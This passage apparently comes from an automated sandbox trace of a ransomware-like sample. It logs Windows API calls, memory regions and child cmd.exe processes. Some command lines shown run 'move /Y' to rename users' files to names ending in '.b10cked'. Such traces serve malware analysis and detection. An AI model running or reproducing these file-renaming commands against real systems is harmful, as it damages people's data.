-18 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0199.726] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0199.726] _wcsicmp (_String1="MSGROO~1.HXN", _String2=".") returned 63 [0199.726] _wcsicmp (_String1="MSGROO~1.HXN", _String2="..") returned 63 [0199.726] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgroo~1.hxn")) returned 0x2022 [0199.727] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.727] SetErrorMode (uMode=0x0) returned 0x0 [0199.727] SetErrorMode (uMode=0x1) returned 0x0 [0199.727] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", nBufferLength=0x104, lpBuffer=0x20f17c, lpFilePart=0x20f164 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", lpFilePart=0x20f164*="MSGROO~1.HXN") returned 0x27 [0199.727] SetErrorMode (uMode=0x0) returned 0x1 [0199.727] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0199.727] _wcsicmp (_String1="MSGROO~1.HXN", _String2=".") returned 63 [0199.727] _wcsicmp (_String1="MSGROO~1.HXN", _String2="..") returned 63 [0199.727] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgroo~1.hxn")) returned 0x2022 [0199.727] SetErrorMode (uMode=0x0) returned 0x0 [0199.727] SetErrorMode (uMode=0x1) returned 0x0 [0199.727] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", nBufferLength=0x104, lpBuffer=0x20f5f8, lpFilePart=0x20f390 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", 
lpFilePart=0x20f390*="MSGROO~1.HXN") returned 0x27 [0199.727] SetErrorMode (uMode=0x0) returned 0x1 [0199.727] SetErrorMode (uMode=0x0) returned 0x0 [0199.727] SetErrorMode (uMode=0x1) returned 0x0 [0199.727] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x20f800, lpFilePart=0x20f390 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked", lpFilePart=0x20f390*="MS.GROOVE.14.1033.hxn.b10cked") returned 0x38 [0199.727] SetErrorMode (uMode=0x0) returned 0x1 [0199.728] SetLastError (dwErrCode=0x0) [0199.728] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.groove.14.1033.hxn.b10cked")) returned 0xffffffff [0199.728] GetLastError () returned 0x2 [0199.728] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x20ed0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ed0c) returned 0x3c0e70 [0199.728] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x20ed0c | out: lpFindFileData=0x20ed0c) returned 0 [0199.729] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.729] GetLastError () returned 0x12 [0199.729] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x20ed0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ed0c) returned 0x3c0e70 [0199.729] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x20ed0c | out: lpFindFileData=0x20ed0c) returned 0 [0199.729] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.729] GetLastError () returned 0x12 [0199.730] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3d1be0, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1be0) returned 0x3c0e70 [0199.730] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x3d1be0 | out: lpFindFileData=0x3d1be0) returned 0 [0199.730] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.730] GetLastError () returned 0x12 [0199.730] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3d1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1be0) returned 0x3c0e70 [0199.731] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x3d1be0 | out: lpFindFileData=0x3d1be0) returned 0 [0199.731] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.731] GetLastError () returned 0x12 [0199.731] _get_osfhandle (_FileHandle=2) returned 0xb [0199.731] GetFileType (hFile=0xb) returned 0x2 [0199.762] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0199.762] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20eedc | out: lpMode=0x20eedc) returned 1 [0199.763] _get_osfhandle (_FileHandle=2) returned 0xb [0199.763] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x20ef10 | out: lpConsoleScreenBufferInfo=0x20ef10) returned 1 [0199.763] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0199.764] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ef50 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0199.764] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x20ef34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ef34*=0x2c) returned 1 [0199.765] longjmp () [0199.765] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0199.765] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0199.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.765] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0199.765] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.765] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0199.765] SetConsoleInputExeNameW () returned 0x1 [0199.765] GetConsoleOutputCP () returned 0x1b5 [0199.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0199.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.766] exit (_Code=1) Process: id = "462" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29206 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29207 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29208 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x0000000000040000" filename = "" Region: id = 29209 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 29210 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29211 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29212 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29213 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29214 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29215 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30093 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30094 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30095 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 30096 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 30097 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 30098 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30099 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30100 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30101 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30102 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30103 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30104 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30105 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 30106 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30107 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 30108 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30109 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30110 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 30111 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 30112 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 30113 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 30114 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 30115 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 30116 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 30117 start_va = 0x1310000 end_va = 0x13cffff entry_point = 0x1310000 region_type = mapped_file name = 
"kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 658 os_tid = 0xc98 [0203.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f7c4 | out: lpSystemTimeAsFileTime=0x14f7c4*(dwLowDateTime=0xade73340, dwHighDateTime=0x1d440a9)) [0203.152] GetCurrentProcessId () returned 0xa18 [0203.152] GetCurrentThreadId () returned 0xc98 [0203.152] GetTickCount () returned 0x394ee [0203.152] QueryPerformanceCounter (in: lpPerformanceCount=0x14f7bc | out: lpPerformanceCount=0x14f7bc*=25994152944) returned 1 [0203.153] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0203.153] __set_app_type (_Type=0x1) [0203.153] __p__fmode () returned 0x76b331f4 [0203.153] __p__commode () returned 0x76b331fc [0203.153] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0203.153] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0203.153] GetCurrentThreadId () returned 0xc98 [0203.153] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0203.153] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.153] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0203.153] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.154] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.154] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f754 | out: phkResult=0x14f754*=0x0) returned 0x2 [0203.154] VirtualQuery (in: lpAddress=0x14f78b, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0203.154] GetConsoleOutputCP () returned 0x1b5 [0203.154] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.154] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0203.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.154] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0203.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.154] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.154] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.155] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.155] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.155] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.155] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) 
returned 1 [0203.155] GetEnvironmentStringsW () returned 0x1b0188* [0203.155] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0203.155] GetEnvironmentStringsW () returned 0x1b0188* [0203.155] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0203.155] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e6c4 | out: phkResult=0x14e6c4*=0x40) returned 0x0 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0xb0, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x0, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e6cc, 
lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegCloseKey (hKey=0x40) returned 0x0 [0203.156] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e6c4 | out: phkResult=0x14e6c4*=0x40) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x0, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x9, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x9, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, 
lpData=0x14e6d0*=0x9, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegCloseKey (hKey=0x40) returned 0x0 [0203.156] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a5 [0203.156] srand (_Seed=0x5b8863a5) [0203.156] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"" [0203.156] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"" [0203.156] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.156] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0203.157] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.157] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.157] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.157] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0203.157] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0203.157] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0203.157] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0203.157] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0203.157] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0203.157] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 
[0203.157] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0203.157] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0203.157] GetEnvironmentStringsW () returned 0x1b22d8* [0203.157] FreeEnvironmentStringsW (penv=0x1b22d8) returned 1 [0203.157] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.157] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.157] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.157] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.157] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.157] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.157] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.157] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.157] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.157] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.157] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f490 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f490, lpFilePart=0x14f48c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f48c*="Desktop") returned 0x18 [0203.157] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.158] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f20c | out: lpFindFileData=0x14f20c) returned 0x1b0018 [0203.158] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0203.158] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f20c | out: lpFindFileData=0x14f20c) returned 0x1b0018 [0203.158] FindClose 
